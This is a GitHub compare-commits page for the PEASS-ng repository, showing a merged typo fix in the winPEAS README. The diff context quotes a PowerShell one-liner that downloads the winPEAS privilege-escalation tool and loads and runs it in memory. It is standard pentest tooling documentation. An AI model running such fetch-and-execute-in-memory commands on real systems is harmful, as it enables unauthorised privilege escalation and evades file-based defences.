Compare commits

...

2 Commits

Author SHA1 Message Date
SirBroccoli
24e9c54290 Merge pull request #505 from jtothef/patch-1
Update README.md
2025-10-04 10:36:24 +02:00
jtothef
7c9f431649 Update README.md
Fix typo
2025-09-23 12:49:05 -05:00

View File

@@ -22,7 +22,7 @@ $url = "https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany
# One liner to download and execute winPEASany from memory in a PS shell
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")
# The cprevios cmd in 2 lines
# The previous cmd in 2 lines
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content));
[winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use